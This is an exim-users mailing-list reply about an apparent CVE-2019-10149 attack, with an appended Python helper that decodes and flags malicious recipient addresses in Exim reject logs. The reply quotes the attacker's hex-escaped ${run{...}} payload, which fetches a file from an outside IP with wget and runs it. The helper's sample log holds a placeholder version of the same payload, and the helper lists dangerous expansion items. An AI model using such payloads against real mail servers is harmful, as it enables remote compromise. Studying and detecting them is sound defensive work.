Re: [exim] just been hacked, could be CVE-2019-10149?

Author: Klaus Ethgen
Date:  
To: exim-users
Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
Hi,

On Tue, 11 Jun 2019 at 7:53, Cyborg via Exim-users wrote:
> <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ekqvuhtpi\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ekqvuhtpi\x20\x2dn\x22\x20\x26}}@???>:
> Restricted characters in address

Oh, you censored the address you are sending from? :-D

> This attack was presented to you by... the Seychelles Islands.

Ah, and I wondered why I did not see any attempt in my logs.

But I have the following blocks:

... in my ipfilter, so blocking most of the net ranges that are owned by
Seychelles. There is nothing good coming from them. (The date is when I
blocked them.)

Regards
   Klaus
-- 
Klaus Ethgen                                       http://www.ethgen.ch/
pub  4096R/4E20AF1C 2011-05-16            Klaus Ethgen <Klaus@???>
Fingerprint: 85D4 CA42 952C 949B 1753  62B3 79D0 B06F 4E20 AF1C
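The rejected RCPT line quoted above hides an Exim `${run{...}}` expansion item behind `\xNN` escapes, which is why it is hard to read in a reject log. The following detection helper, added here as an example and not part of the thread or of Exim, decodes the escapes in the local part of a rejected address and flags expansion items that execute commands. The log line and the host in it are constructed placeholders, not the address from the original message.

```python
import re
from typing import Optional

# Constructed sample reject line, modelled on the one quoted in the thread.
# The hex-escaped local part and the TEST-NET host are placeholders.
SAMPLE_LOG = (
    '2019-06-11 07:53:00 H=(example) [203.0.113.10] F=<> rejected RCPT '
    '<bin+${run{\\x2fbin\\x2fsh\\x20\\x2dc\\x20\\x22wget\\x20http\\x3a\\x2f\\x2f'
    '203\\x2e0\\x2e113\\x2e10\\x2fx\\x22}}@example.org>: Restricted characters in address'
)

# Exim string-expansion items that run commands or read files. None of them
# belongs in a recipient local part, so any hit is worth an alert.
DANGEROUS_ITEMS = ("${run{", "${readsocket{", "${readfile{", "${perl{")

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
RCPT_ADDR = re.compile(r"RCPT <([^>]*)>")


def decode_hex_escapes(s: str) -> str:
    """Undo \\xNN escapes so the embedded command becomes readable."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def analyse_rcpt(line: str) -> Optional[dict]:
    """Extract the rejected recipient, decode its local part and report
    any dangerous expansion items found. Returns None if no RCPT present."""
    m = RCPT_ADDR.search(line)
    if not m:
        return None
    raw = m.group(1)
    # Split on the last literal '@' before decoding: an escaped \x40 in the
    # local part must not be mistaken for the domain separator.
    local_part = raw.rsplit("@", 1)[0]
    decoded = decode_hex_escapes(local_part)
    hits = [item for item in DANGEROUS_ITEMS if item in decoded]
    return {
        "local_part": local_part,
        "decoded": decoded,
        "expansion_items": hits,
        "suspicious": bool(hits),
    }


if __name__ == "__main__":
    result = analyse_rcpt(SAMPLE_LOG)
    print("suspicious:", result["suspicious"])
    print("decoded local part:", result["decoded"])
```

Run over an Exim reject log (for example `grep 'rejected RCPT' /var/log/exim4/rejectlog`), the decoded local part shows the command a successful expansion would have executed, which is what an incident responder needs when triaging hosts that were not protected by the "Restricted characters in address" ACL check.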